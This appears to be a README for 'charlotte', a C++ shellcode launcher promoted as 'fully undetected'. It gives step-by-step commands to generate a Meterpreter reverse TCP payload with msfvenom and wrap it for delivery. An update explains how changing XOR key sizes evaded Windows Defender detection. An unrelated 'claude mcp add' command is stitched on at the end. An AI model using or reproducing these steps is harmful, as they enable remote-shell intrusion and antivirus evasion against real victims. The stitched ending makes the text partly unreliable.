c++ fully undetected shellcode launcher ;)
releasing this to celebrate the birth of my newborn
13/05/2021:
17/05/2021:

git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py
example: 1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* 2. cd charlotte 3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin 4. python charlotte.py 5. profit

17/05/21:
apparently Microsoft Windows Defender was able to detect the .DLL binary,
and how did they flag it? by looking for several XOR keys of 16 byte size
changing it to 9 shown in the POC .gif below shows it is now undetected again
cheers!

$ claude mcp add charlotte \
-- python -m otcore.mcp_server <graph>